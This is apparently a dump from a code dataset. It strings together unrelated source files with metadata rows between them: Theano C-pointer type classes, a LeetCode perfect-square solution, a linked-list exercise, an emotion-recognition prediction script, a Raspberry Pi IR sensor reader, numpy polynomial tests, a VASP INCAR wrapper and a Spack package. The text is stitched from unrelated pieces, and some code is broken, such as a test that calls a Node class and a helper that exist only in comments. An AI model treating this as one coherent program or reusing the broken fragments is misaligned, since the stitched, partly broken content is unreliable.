    def c_init(self, name, sub):
        return """
        %(name)s = NULL;
        """ % locals()
    def c_extract(self, name, sub, check_input=True):
        # Borrow the Python object directly, taking a new reference.
        return """
        Py_INCREF(py_%(name)s);
        %(name)s = py_%(name)s;
        """ % locals()
    def c_cleanup(self, name, sub):
        return """
        Py_XDECREF(%(name)s);
        """ % locals()
    def c_sync(self, name, sub):
        # Publish the C-side pointer back to Python, substituting Py_None
        # for NULL and keeping reference counts balanced.
        return """
        assert(py_%(name)s->ob_refcnt > 1);
        Py_DECREF(py_%(name)s);
        py_%(name)s = %(name)s ? %(name)s : Py_None;
        Py_INCREF(py_%(name)s);
        """ % locals()
    def c_code_cache_version(self):
        return (1,)
    def __str__(self):
        return self.__class__.__name__
# Module-level singleton instance of the Generic type.
generic = Generic()
class CDataType(Type):
    """
    Represents opaque C data to be passed around. The intent is to
    ease passing arbitrary data between ops C code.

    On the Python side a value of this type is a PyCapsule (Python 3)
    or PyCObject (Python 2) wrapping the raw pointer.
    """

    # Resolve the Python-level class of PyCapsule / PyCObject through
    # ctypes (it is not exposed directly); filter() uses it to validate
    # values. ``del ctypes`` keeps the module out of the class namespace.
    import ctypes
    if PY3:
        _cdata_type = ctypes.py_object.from_address(
            ctypes.addressof(ctypes.pythonapi.PyCapsule_Type)).value
    else:
        _cdata_type = ctypes.py_object.from_address(
            ctypes.addressof(ctypes.pythonapi.PyCObject_Type)).value
    del ctypes

    def __init__(self, ctype, freefunc=None):
        """
        Build a type made to represent a C pointer in theano.
        :param ctype: The type of the pointer (complete with the `*`)
        :param freefunc: a function to call to free the pointer. This
                         function must have a `void` return and take a
                         single pointer argument.
        """
        assert isinstance(ctype, basestring)
        self.ctype = ctype
        if freefunc is not None:
            assert isinstance(freefunc, basestring)
        self.freefunc = freefunc

    def __eq__(self, other):
        # BUG FIX: the original joined the last two comparisons with
        # commas instead of ``and``, so the expression evaluated to a
        # 2-tuple ``(bool, bool)`` -- always truthy -- making every pair
        # of CDataType instances compare equal regardless of ctype or
        # freefunc.
        return (type(self) == type(other) and
                self.ctype == other.ctype and
                self.freefunc == other.freefunc)

    def __hash__(self):
        # Consistent with __eq__: same (class, ctype, freefunc) triple.
        return hash((type(self), self.ctype, self.freefunc))

    def filter(self, data, strict=False, allow_downcast=None):
        # Only None or a genuine PyCObject/PyCapsule is accepted; no
        # conversion is ever attempted.
        if data is not None and not isinstance(data, self._cdata_type):
            raise TypeError("expected None or PyCObject/PyCapsule")
        return data

    # --- C code generation (CLinkerType interface) -------------------

    def c_declare(self, name, sub, check_input=True):
        return """
%(ctype)s %(name)s;
""" % dict(ctype=self.ctype, name=name)

    def c_init(self, name, sub):
        return "%(name)s = NULL;" % dict(name=name)

    def c_extract(self, name, sub, check_input=True):
        # Unwrap the raw pointer from the capsule/cobject.
        if PY3:
            s = """
%(name)s = (%(ctype)s)PyCapsule_GetPointer(py_%(name)s, NULL);
if (%(name)s == NULL) %(fail)s
"""
        else:
            s = """
%(name)s = (%(ctype)s)PyCObject_AsVoidPtr(py_%(name)s);
"""
        return s % dict(name=name, ctype=self.ctype, fail=sub['fail'])

    def c_support_code(self):
        # Python 3 capsules store the free function in their context;
        # this destructor retrieves and invokes it on release.
        if PY3:
            return """
void _py3_destructor(PyObject *o) {
void *d = PyCapsule_GetContext(o);
void *p = PyCapsule_GetPointer(o, NULL);
void (*f)(void *) = (void (*)(void *))d;
if (f != NULL) f(p);
}
"""
        else:
            return ""

    def c_sync(self, name, sub):
        # Wrap the C pointer back into a capsule/cobject (or Py_None when
        # the pointer is NULL), attaching freefunc as the destructor.
        freefunc = self.freefunc
        if freefunc is None:
            freefunc = "NULL"
        s = """
Py_XDECREF(py_%(name)s);
if (%(name)s == NULL) {
py_%(name)s = Py_None;
Py_INCREF(py_%(name)s);
} else """
        if PY3:
            s += """{
py_%(name)s = PyCapsule_New((void *)%(name)s, NULL,
_py3_destructor);
if (py_%(name)s != NULL) {
if (PyCapsule_SetContext(py_%(name)s, (void *)%(freefunc)s) != 0) {
/* This won't trigger a call to freefunc since it could not be
set. The error case below will do it. */
Py_DECREF(py_%(name)s);
/* Signal the error */
py_%(name)s = NULL;
}
}
}"""
        else:
            s += """{
py_%(name)s = PyCObject_FromVoidPtr((void *)%(name)s,
(void (*)(void *))%(freefunc)s);
}"""
        if self.freefunc is not None:
            # On wrapping failure, free the pointer ourselves to avoid a leak.
            s += """
if (py_%(name)s == NULL) { %(freefunc)s(%(name)s); }
"""
        return s % dict(name=name, freefunc=freefunc)

    def c_cleanup(self, name, sub):
        # No need to do anything here since the CObject/Capsule will
        # free the data for us when released.
        return ""

    def c_code_cache_version(self):
        return (2,)

    def __str__(self):
        return "%s{%s}" % (self.__class__.__name__, self.ctype)
class CDataTypeConstant(graph.Constant):
    def signature(self):
        # The Op.c_code* methods can't access the data, so it can't
        # change the code depending of it. So there is no need to put
        # it in the signature. Also, under Python 2, PyCObject aren't
        # picklable. So using the PyCObject in the signature would
        # disable the c code cache for op that have it as an input.
        return (self.type,)


# Register the Constant subclass used for CDataType graph constants.
CDataType.Constant = CDataTypeConstant
| 33.04232
| 117
| 0.618092
|
4a1108207aaa082416d6733da5f86cb9e12d6a58
| 1,529
|
py
|
Python
|
No_0367_Valid Perfect Square/valid_perfect_square_by_newton_method.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | 32
|
2020-01-05T13:37:16.000Z
|
2022-03-26T07:27:09.000Z
|
No_0367_Valid Perfect Square/valid_perfect_square_by_newton_method.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | null | null | null |
No_0367_Valid Perfect Square/valid_perfect_square_by_newton_method.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | 8
|
2020-06-18T16:17:27.000Z
|
2022-03-15T23:58:18.000Z
|
'''
Description:
Given a positive integer num, write a function which returns True if num is a perfect square else False.
Note: Do not use any built-in library function such as sqrt.
Example 1:
Input: 16
Output: true
Example 2:
Input: 14
Output: false
'''
class Solution:
    def isPerfectSquare(self, num: int) -> bool:
        """Return True if ``num`` is a perfect square (Newton's method).

        Uses pure integer arithmetic (``//`` throughout) so the answer
        stays exact even for inputs above 2**53, where the original
        float division ``num / x_approx`` would lose precision.
        """
        x_approx = num
        # Integer Newton iteration: converges to floor(sqrt(num)) from
        # above, then the loop guard stops it.
        while x_approx ** 2 > num:
            x_approx = (x_approx + num // x_approx) // 2
        return x_approx ** 2 == num
# n : the input value of num.
## Time Complexity: O( log n )
#
# The overhead in time is the cost of Newton method, which is of O( log n ).
## Space Complexity: O( 1 )
#
# The overhead in space is the looping index and temporary arithmetic variable, which is of O( 1 ).
def test_bench():
    """Print isPerfectSquare() for a fixed set of sample inputs.

    Expected output, in order: True, False, False, True, False, False,
    True, False, True, False.
    """
    samples = (16, 14, 24, 25, 26, 35, 36, 37, 1024, 2147483647)
    for number in samples:
        print(Solution().isPerfectSquare(number))


if __name__ == '__main__':
    test_bench()
| 19.35443
| 104
| 0.483976
|
4a11086e2ffa1509dffac1dac1d912e0dda7ec47
| 99
|
py
|
Python
|
output/models/ms_data/model_groups/mg_c011_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/model_groups/mg_c011_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/model_groups/mg_c011_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
# Generated package __init__: re-export the Test binding so that
# ``from ...mg_c011_xsd import Test`` works directly.
from output.models.ms_data.model_groups.mg_c011_xsd.mg_c011 import Test

__all__ = [
    "Test",
]
| 16.5
| 71
| 0.747475
|
4a11092e8bb834b3f8c9f5e5c7b667cfbb10b2dd
| 1,066
|
py
|
Python
|
python/sprint_12/tmp/test.py
|
Talgatovich/algorithms-templates
|
e7c6fd71451304ed0dacc393c3f30ca3f5282d46
|
[
"MIT"
] | null | null | null |
python/sprint_12/tmp/test.py
|
Talgatovich/algorithms-templates
|
e7c6fd71451304ed0dacc393c3f30ca3f5282d46
|
[
"MIT"
] | null | null | null |
python/sprint_12/tmp/test.py
|
Talgatovich/algorithms-templates
|
e7c6fd71451304ed0dacc393c3f30ca3f5282d46
|
[
"MIT"
] | null | null | null |
# class Node:
# def __init__(self, value, next_item=None):
# self.value = value
# self.next_item = next_item
#
#
# def define_my_define(node):
# while node:
# print(node.value)
# node = node.next_item
def get_node_by_index(node, index):
    """Walk ``index`` hops along ``next_item`` links and return the node
    reached (``index == 0`` returns ``node`` itself)."""
    current = node
    remaining = index
    while remaining:
        current = current.next_item
        remaining -= 1
    return current
def solution(head, index):
    """Remove the node at position ``index`` from the singly linked list
    starting at ``head`` and return the (possibly new) head."""
    # Removing the head: the new head is simply the second node.
    if index == 0:
        return get_node_by_index(head, 1)
    # Splice: node before the victim now points at the node after it.
    node_before = get_node_by_index(head, index - 1)
    node_after = get_node_by_index(head, index + 1)
    node_before.next_item = node_after
    return head
def test():
    # NOTE(review): ``Node`` and ``define_my_define`` only exist in the
    # commented-out block at the top of this file, so calling this
    # function currently raises NameError -- restore them before use.
    node4 = Node("node4!", None)
    node3 = Node("node3", node4)
    node2 = Node("node2", node3)
    new_node = Node("new node MF!!!", node2)
    node1 = Node("node1", new_node)
    node0 = Node("node0", node1)
    node00 = Node("node00", node0)
    index = 3
    # NOTE(review): ``value`` is assigned but never used.
    value = "NEWWEST NODE!!!!"
    a = solution(node00, index)
    res = define_my_define(a)
    return res


print(test())
| 22.680851
| 59
| 0.619137
|
4a110c228cce4bf1775db65c76bb3e408071cc0d
| 3,330
|
py
|
Python
|
predict.py
|
vkso/FER
|
b7207341139ff451753a4c4640530e915673fc7c
|
[
"Apache-2.0"
] | null | null | null |
predict.py
|
vkso/FER
|
b7207341139ff451753a4c4640530e915673fc7c
|
[
"Apache-2.0"
] | null | null | null |
predict.py
|
vkso/FER
|
b7207341139ff451753a4c4640530e915673fc7c
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
from customParameters import *
import myMethod as myMethod
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sn
import argparse
# use method:
# python predict.py --model myModel --type whole_history_epoch
# python predict.py --model myVGG --type whole --load_path /Users/wyc/Downloads/cp-0560.ckpt
# python predict.py --model myModel --type whole_history_epoch --train_name withoutFirstBN --total_epoch 171

# CLI options: which model architecture to build, evaluation mode
# ('whole' = single checkpoint, 'whole_history_epoch' = sweep saved
# checkpoints), checkpoint path, run name and epoch count for the sweep.
parser = argparse.ArgumentParser(description='predicted with confusion matrix')
parser.add_argument('--model', type=str, default='myModel')
parser.add_argument('--type', type=str, default='whole')
parser.add_argument('--load_path', type=str)
parser.add_argument('--train_name', type=str, default='newTrain')
parser.add_argument('--total_epoch', type=int, default=600)
# parser.add_argument('--gpus', type=int, default=1)
args = parser.parse_args()
max_epoch = args.total_epoch

test_private_path = "./data/FER2013/private_test.csv"

# Augmented private test set (each image is expanded 10x downstream).
private_test_data = myMethod.get_dataset_test(test_private_path)
private_test_data = private_test_data.map(myMethod.preprocess_DAtestdata)

# get standard result
# FIX: ``dtype=int`` replaces the deprecated alias ``np.int``, which was
# removed in NumPy 1.24 and made this line raise AttributeError there.
correct_answer = np.loadtxt(test_private_path, dtype=int, delimiter=',',
                            skiprows=1, usecols=(0), encoding='utf-8')
# correct_answer = correct_answer.repeat(10)

if args.model == 'myVGG':
    model = myMethod.create_myVGG()
else:
    model = myMethod.create_myModel()

model.compile(optimizer='adam',
              loss='categorical_crossentropy',
              metrics=["accuracy"])
def get_acc_predict(load_path):
    """Evaluate the checkpoint at ``load_path`` on the private test set.

    Each of the 3589 test images appears 10 consecutive times in the
    prediction output (test-time augmentation); the 10 softmax vectors
    per image are summed before taking argmax. Prints the number of
    correct predictions and the accuracy, and returns the predicted
    class indices (shape ``(3589,)``).
    """
    model.load_weights(load_path)
    x = model.predict(private_test_data,
                      steps=TOTAL_TEST // BATCH_SIZE_TEST_DA)
    # One vectorized reshape+sum replaces the original nested Python
    # loops over 3589 images x 10 augmentations.
    predict_result = np.asarray(x)[:3589 * 10].reshape(3589, 10, 7).sum(axis=1)
    y = np.argmax(predict_result, axis=1)
    # Renamed from ``sum`` to avoid shadowing the builtin.
    n_correct = np.sum(y == correct_answer)
    print('sum: {}'.format(n_correct))
    print('acc: {}'.format(n_correct / 3589))
    return y
def get_history_acc(testname):
    """Sweep checkpoints saved every 10 epochs under
    ./train_history/<testname>/ and report per-epoch and best test
    accuracy, using the same 10x augmentation voting as
    get_acc_predict()."""
    max_acc = 0
    best_epoch = 0
    for epoch in range(10, max_epoch, 10):
        load_path = "./train_history/" + testname + '/cp-' + str(epoch).zfill(4) + '.ckpt'
        model.load_weights(load_path)
        x = model.predict(private_test_data,
                          steps=TOTAL_TEST // BATCH_SIZE_TEST_DA)
        # Sum the 10 augmented prediction vectors per image.
        predict_result = np.zeros(shape=(3589, 7))
        for i in range(0, 3589):
            # NOTE(review): ``sum`` shadows the builtin in this scope.
            sum = np.zeros(shape=(1, 7))
            for j in range(0, 10):
                sum += x[10 * i + j]
            predict_result[i] = sum
        y = np.argmax(predict_result, axis=1)
        z = y - correct_answer
        sum = np.sum(z == 0)
        if sum / 3589 > max_acc:
            max_acc = sum / 3589
            best_epoch = epoch
        print('epoch: {}, correct num: {}, acc: {}'.format(epoch,sum, sum/3589))
    print('epoch: {} -> max acc: {}'.format(best_epoch, max_acc))
# Command-line dispatch: evaluate a single checkpoint ('whole') or
# sweep every saved checkpoint ('whole_history_epoch').
if args.type == 'whole':
    load_path = args.load_path
    y = get_acc_predict(load_path)
    myMethod.plot_heat_map(y, correct_answer)

if args.type == 'whole_history_epoch':
    testname = args.train_name
    get_history_acc(testname)
| 32.970297
| 108
| 0.653453
|
4a110c92bbf52c4de802673121f891dc7dd5e33f
| 1,080
|
py
|
Python
|
OtenkiBuzzer/Sensor.py
|
kentaro/otenki-buzzer
|
be007d7859770bc1b90c0b9cd9080e88aef11ad0
|
[
"MIT"
] | 3
|
2016-06-14T10:18:54.000Z
|
2016-06-14T10:30:44.000Z
|
OtenkiBuzzer/Sensor.py
|
kentaro/otenki-buzzer
|
be007d7859770bc1b90c0b9cd9080e88aef11ad0
|
[
"MIT"
] | null | null | null |
OtenkiBuzzer/Sensor.py
|
kentaro/otenki-buzzer
|
be007d7859770bc1b90c0b9cd9080e88aef11ad0
|
[
"MIT"
] | null | null | null |
import time, wiringpi as pi
# SPI channel and ADC input channel used by Sensor below.
# NOTE(review): the command word built in Sensor.check() looks like an
# MCP3002-style 10-bit ADC protocol -- confirm against the wiring.
SPI_CH = 0
READ_CH = 0
class Sensor:
    """Distance reading from a GP2Y0A21-style IR ranger sampled through
    an SPI ADC via wiringpi."""

    def __init__(self):
        # 1 MHz SPI clock on channel SPI_CH.
        pi.wiringPiSPISetup(SPI_CH, 1000000)

    def check(self):
        """Sample the ADC once and return the converted distance."""
        command = 0x6800 | (0x1800 * READ_CH)
        command = command.to_bytes(2, byteorder='big')
        pi.wiringPiSPIDataRW(SPI_CH, command)
        # 10-bit conversion result, scaled to volts (3.3 V reference).
        raw = (command[0] * 256 + command[1]) & 0x3ff
        volt = raw * 3.3 / 1034
        return self.gp2y0a21(volt)

    def gp2y0a21(self, volt):
        """Convert a GP2Y0A21 output voltage to a distance using a
        piecewise-linear inverse of the sensor's response curve."""
        if volt >= 2.25:
            return (volt - 4.625) / -0.2375
        if volt >= 1.7:
            return (volt - 3.35) / -0.11
        if volt >= 1.3:
            return (volt - 2.9) / -0.08
        if volt >= 0.9:
            return (volt - 2.1) / -0.04
        if volt >= 0.6:
            return (volt - 1.35) / -0.015
        if volt >= 0.5:
            return (volt - 1.1) / -0.01
        return (volt - 0.8) / -0.005
| 28.421053
| 56
| 0.494444
|
4a110d58eef0a709843b9add5d07897ae67548d4
| 4,561
|
py
|
Python
|
numpy/lib/tests/test_polynomial.py
|
ivanov/numpy
|
6d2665626e40f346bb5af8d780579f5a429ff9ba
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/lib/tests/test_polynomial.py
|
ivanov/numpy
|
6d2665626e40f346bb5af8d780579f5a429ff9ba
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/lib/tests/test_polynomial.py
|
ivanov/numpy
|
6d2665626e40f346bb5af8d780579f5a429ff9ba
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division, absolute_import
'''
>>> p = np.poly1d([1.,2,3])
>>> p
poly1d([ 1., 2., 3.])
>>> print(p)
2
1 x + 2 x + 3
>>> q = np.poly1d([3.,2,1])
>>> q
poly1d([ 3., 2., 1.])
>>> print(q)
2
3 x + 2 x + 1
>>> print(np.poly1d([1.89999+2j, -3j, -5.12345678, 2+1j]))
3 2
(1.9 + 2j) x - 3j x - 5.123 x + (2 + 1j)
>>> print(np.poly1d([-3, -2, -1]))
2
-3 x - 2 x - 1
>>> p(0)
3.0
>>> p(5)
38.0
>>> q(0)
1.0
>>> q(5)
86.0
>>> p * q
poly1d([ 3., 8., 14., 8., 3.])
>>> p / q
(poly1d([ 0.33333333]), poly1d([ 1.33333333, 2.66666667]))
>>> p + q
poly1d([ 4., 4., 4.])
>>> p - q
poly1d([-2., 0., 2.])
>>> p ** 4
poly1d([ 1., 8., 36., 104., 214., 312., 324., 216., 81.])
>>> p(q)
poly1d([ 9., 12., 16., 8., 6.])
>>> q(p)
poly1d([ 3., 12., 32., 40., 34.])
>>> np.asarray(p)
array([ 1., 2., 3.])
>>> len(p)
2
>>> p[0], p[1], p[2], p[3]
(3.0, 2.0, 1.0, 0)
>>> p.integ()
poly1d([ 0.33333333, 1. , 3. , 0. ])
>>> p.integ(1)
poly1d([ 0.33333333, 1. , 3. , 0. ])
>>> p.integ(5)
poly1d([ 0.00039683, 0.00277778, 0.025 , 0. , 0. ,
0. , 0. , 0. ])
>>> p.deriv()
poly1d([ 2., 2.])
>>> p.deriv(2)
poly1d([ 2.])
>>> q = np.poly1d([1.,2,3], variable='y')
>>> print(q)
2
1 y + 2 y + 3
>>> q = np.poly1d([1.,2,3], variable='lambda')
>>> print(q)
2
1 lambda + 2 lambda + 3
>>> np.polydiv(np.poly1d([1,0,-1]), np.poly1d([1,1]))
(poly1d([ 1., -1.]), poly1d([ 0.]))
'''
from numpy.testing import *
import numpy as np
class TestDocs(TestCase):
    # Execute the doctests embedded in this module's docstring.
    def test_doctests(self):
        return rundocs()

    def test_roots(self):
        assert_array_equal(np.roots([1,0,0]), [0,0])

    def test_str_leading_zeros(self):
        # A coefficient explicitly set to zero must be dropped from the
        # pretty-printed representation.
        p = np.poly1d([4,3,2,1])
        p[3] = 0
        assert_equal(str(p),
                     " 2\n"
                     "3 x + 2 x + 1")

        p = np.poly1d([1,2])
        p[0] = 0
        p[1] = 0
        assert_equal(str(p), " \n0")

    def test_polyfit(self):
        c = np.array([3., 2., 1.])
        x = np.linspace(0,2,7)
        y = np.polyval(c,x)
        err = [1,-1,1,-1,1,-1,1]
        weights = np.arange(8,1,-1)**2/7.0

        # check 1D case
        m, cov = np.polyfit(x,y+err,2,cov=True)
        est = [3.8571, 0.2857, 1.619]
        assert_almost_equal(est, m, decimal=4)
        val0 = [[2.9388, -5.8776, 1.6327],
                [-5.8776, 12.7347, -4.2449],
                [1.6327, -4.2449, 2.3220]]
        assert_almost_equal(val0, cov, decimal=4)

        # weighted fit: different coefficients and covariance expected
        m2, cov2 = np.polyfit(x,y+err,2,w=weights,cov=True)
        assert_almost_equal([4.8927, -1.0177, 1.7768], m2, decimal=4)
        val = [[ 8.7929, -10.0103, 0.9756],
               [-10.0103, 13.6134, -1.8178],
               [ 0.9756, -1.8178, 0.6674]]
        assert_almost_equal(val, cov2, decimal=4)

        # check 2D (n,1) case
        y = y[:,np.newaxis]
        c = c[:,np.newaxis]
        assert_almost_equal(c, np.polyfit(x,y,2))

        # check 2D (n,2) case
        yy = np.concatenate((y,y), axis=1)
        cc = np.concatenate((c,c), axis=1)
        assert_almost_equal(cc, np.polyfit(x,yy,2))

        # per-column covariance matrices must match the 1D result
        m, cov = np.polyfit(x,yy + np.array(err)[:,np.newaxis],2,cov=True)
        assert_almost_equal(est, m[:,0], decimal=4)
        assert_almost_equal(est, m[:,1], decimal=4)
        assert_almost_equal(val0, cov[:,:,0], decimal=4)
        assert_almost_equal(val0, cov[:,:,1], decimal=4)

    def test_objects(self):
        # poly1d must preserve object-dtype (Decimal) coefficients exactly.
        from decimal import Decimal
        p = np.poly1d([Decimal('4.0'), Decimal('3.0'), Decimal('2.0')])
        p2 = p * Decimal('1.333333333333333')
        assert_(p2[1] == Decimal("3.9999999999999990"))
        p2 = p.deriv()
        assert_(p2[1] == Decimal('8.0'))
        p2 = p.integ()
        assert_(p2[3] == Decimal("1.333333333333333333333333333"))
        assert_(p2[2] == Decimal('1.5'))
        assert_(np.issubdtype(p2.coeffs.dtype, np.object_))

    def test_complex(self):
        p = np.poly1d([3j, 2j, 1j])
        p2 = p.integ()
        assert_((p2.coeffs == [1j,1j,1j,0]).all())
        p2 = p.deriv()
        assert_((p2.coeffs == [6j,2j]).all())

    def test_integ_coeffs(self):
        # integ(3, k=...) prepends the integration constants in order.
        p = np.poly1d([3,2,1])
        p2 = p.integ(3, k=[9,7,6])
        assert_((p2.coeffs == [1/4./5.,1/3./4.,1/2./3.,9/1./2.,7,6]).all())

    def test_zero_dims(self):
        # np.poly on an empty 2-D array may raise ValueError; either
        # outcome is accepted here.
        try:
            np.poly(np.zeros((0, 0)))
        except ValueError:
            pass


if __name__ == "__main__":
    run_module_suite()
| 26.364162
| 75
| 0.475773
|
4a110d7c33f33f92237a37f23b997faf93ae4797
| 3,765
|
py
|
Python
|
aiida_cusp/data/inputs/vasp_incar.py
|
astamminger/aiida_cusp
|
4a5a014fc90761ee8855cbe6305a8f565f9626a3
|
[
"MIT"
] | 2
|
2020-08-10T15:47:10.000Z
|
2022-03-14T12:29:43.000Z
|
aiida_cusp/data/inputs/vasp_incar.py
|
astamminger/aiida_cusp
|
4a5a014fc90761ee8855cbe6305a8f565f9626a3
|
[
"MIT"
] | 13
|
2020-07-10T16:22:05.000Z
|
2022-02-28T18:41:53.000Z
|
aiida_cusp/data/inputs/vasp_incar.py
|
astamminger/aiida_cusp
|
4a5a014fc90761ee8855cbe6305a8f565f9626a3
|
[
"MIT"
] | 2
|
2020-07-09T10:09:04.000Z
|
2020-08-10T15:47:54.000Z
|
# -*- coding: utf-8 -*-
"""
Datatype and methods to initialize and interact with VASP specific INCAR
input data
"""
from aiida.orm import Dict
from pymatgen.io.vasp.inputs import Incar
from aiida_cusp.utils.exceptions import IncarWrapperError
class VaspIncarData(Dict):
    """
    VaspIncarData(incar=None)
    AiiDA compatible node representing a VASP incar data object based on the
    :class:`~pymatgen.io.vasp.inputs.Incar` datatype.
    :param incar: input parameters used to construct the
        :class:`~pymatgen.io.vasp.inputs.Incar` object or a incar object
        itself (Note: may also be set to `None` to initialize an empty incar
        object and use the VASP default parameters)
    :type incar: dict or :class:`~pymatgen.io.vasp.inputs.Incar`
    """
    def __init__(self, *args, **kwargs):
        # if incar is set: assume initialization from user space. Cannot
        # use None here since it is a valid value for incar
        incar = kwargs.pop('incar', False)
        # NOTE(review): this truthiness test also treats an *empty* dict
        # (``incar={}``) as "not set" and falls through to the plain Dict
        # constructor -- confirm that is intended.
        if not incar:
            super(VaspIncarData, self).__init__(*args, **kwargs)
        else:  # redirect to wrapper if incar is set
            incar = IncarWrapper(incar=incar)
            super(VaspIncarData, self).__init__(dict=incar.as_dict())

    def get_incar(self):
        """
        get_incar()
        Create and return a :class:`~pymatgen.io.vasp.inputs.Incar` instance
        initialized from the node's stored incar data contents.
        :return: a pymatgen Incar data instance
        :rtype: :class:`pymatgen.io.vasp.inputs.Incar`
        """
        return Incar.from_dict(self.get_dict())

    def write_file(self, filename):
        """
        write_file(filename)
        Write the stored incar data to VASP input file.
        Output of the contents to the file is redirected to the
        :meth:`pymatgen.io.vasp.inputs.Incar.write_file` method and the created
        output file will be formatted as VASP input file (INCAR)
        :param filename: destination for writing the output file
        :type filename: str
        :return: None
        """
        incar = self.get_incar()
        incar.write_file(filename)
class IncarWrapper(object):
    """
    Factory helper turning user input into a
    :class:`pymatgen.io.vasp.inputs.Incar` instance.

    Accepts a ready-made :class:`~pymatgen.io.vasp.inputs.Incar`
    (returned as-is), a dictionary of valid VASP INCAR parameters (keys
    are upper-cased before being handed to the Incar constructor), or
    `None` (an empty incar is created).

    :param incar: input parameters used to construct the
        :class:`~pymatgen.io.vasp.inputs.Incar` object or an incar object
        itself.
    :type incar: dict or :class:`~pymatgen.io.vasp.inputs.Incar`
    """

    def __new__(cls, incar=None):
        # Pass an existing pymatgen Incar instance straight through.
        if isinstance(incar, Incar):
            return incar
        # Build from a user-supplied parameter dictionary.
        if isinstance(incar, dict):
            return Incar(params=cls.keys_to_upper_case(incar))
        # No input at all: empty incar (VASP defaults will apply).
        if incar is None:
            return Incar(params=None)
        raise IncarWrapperError("Unknown type '{}' for incar parameters"
                                .format(type(incar)))

    @classmethod
    def keys_to_upper_case(cls, rawdict):
        """
        Transform all incar parameter keys to upper case.
        :param rawdict: input dictionary containing incar parameter key
            value pairs with keys possibly of mixed case
        :type rawdict: dict
        """
        upper_cased = {}
        for key, value in rawdict.items():
            upper_cased[key.upper()] = value
        return upper_cased
| 34.541284
| 79
| 0.652855
|
4a11101663c7ba1612b1169eef3c997f8773c2b5
| 2,264
|
py
|
Python
|
var/spack/repos/builtin/packages/strace/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 3
|
2021-09-29T02:14:40.000Z
|
2022-01-27T20:50:36.000Z
|
var/spack/repos/builtin/packages/strace/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 8
|
2022-02-28T11:30:18.000Z
|
2022-03-23T19:34:56.000Z
|
var/spack/repos/builtin/packages/strace/package.py
|
player1537-forks/spack
|
822b7632222ec5a91dc7b7cda5fc0e08715bd47c
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Strace(AutotoolsPackage):
    """Strace is a diagnostic, debugging and instructional userspace
    utility for Linux. It is used to monitor and tamper with interactions
    between processes and the Linux kernel, which include system calls,
    signal deliveries, and changes of process state."""

    homepage = "https://strace.io"
    url = "https://github.com/strace/strace/releases/download/v5.2/strace-5.2.tar.xz"

    # strace depends on Linux-only kernel interfaces.
    conflicts('platform=darwin', msg='strace runs only on Linux.')

    version('5.12', sha256='29171edf9d252f89c988a4c340dfdec662f458cb8c63d85431d64bab5911e7c4')
    version('5.11', sha256='ffe340b10c145a0f85734271e9cce56457d23f21a7ea5931ab32f8cf4e793879')
    version('5.10', sha256='fe3982ea4cd9aeb3b4ba35f6279f0b577a37175d3282be24b9a5537b56b8f01c')
    version('5.9', sha256='39473eb8465546c3e940fb663cb381eba5613160c7302794699d194a4d5d66d9')
    version('5.8', sha256='df4a669f7fff9cc302784085bd4b72fab216a426a3f72c892b28a537b71e7aa9')
    version('5.7', sha256='b284b59f9bcd95b9728cea5bd5c0edc5ebe360af73dc76fbf6334f11c777ccd8')
    version('5.6', sha256='189968eeae06ed9e20166ec55a830943c84374676a457c9fe010edc7541f1b01')
    version('5.5', sha256='9f58958c8e59ea62293d907d10572e352b582bd7948ed21aa28ebb47e5bf30ff')
    version('5.4', sha256='f7d00514d51290b6db78ad7a9de709baf93caa5981498924cbc9a744cfd2a741')
    version('5.3', sha256='6c131198749656401fe3efd6b4b16a07ea867e8f530867ceae8930bbc937a047')
    version('5.2', sha256='d513bc085609a9afd64faf2ce71deb95b96faf46cd7bc86048bc655e4e4c24d2')
    version('5.1', sha256='f5a341b97d7da88ee3760626872a4899bf23cf8dee56901f114be5b1837a9a8b')
    version('5.0', sha256='3b7ad77eb2b81dc6078046a9cc56eed5242b67b63748e7fc28f7c2daf4e647da')
    version('4.21', sha256='5c7688db44073e94c59a5627744e5699454419824cc8166e8bcfd7ec58375c37')

    def configure_args(self):
        # mpers (multiple-personality) support is explicitly disabled on
        # aarch64 and explicitly enabled everywhere else.
        args = []
        if self.spec.target.family == 'aarch64':
            args.append('--enable-mpers=no')
        else:
            args.append('--enable-mpers=yes')
        return args
| 53.904762
| 94
| 0.775618
|
4a11108912943852c129708f7045c665a5e86791
| 10,978
|
py
|
Python
|
autotest/gcore/hdf4_read.py
|
ajolma/gdal
|
19d847c8519919fcd1e7e7247644d28771034317
|
[
"MIT"
] | 1
|
2018-12-19T14:08:20.000Z
|
2018-12-19T14:08:20.000Z
|
autotest/gcore/hdf4_read.py
|
ajolma/gdal
|
19d847c8519919fcd1e7e7247644d28771034317
|
[
"MIT"
] | null | null | null |
autotest/gcore/hdf4_read.py
|
ajolma/gdal
|
19d847c8519919fcd1e7e7247644d28771034317
|
[
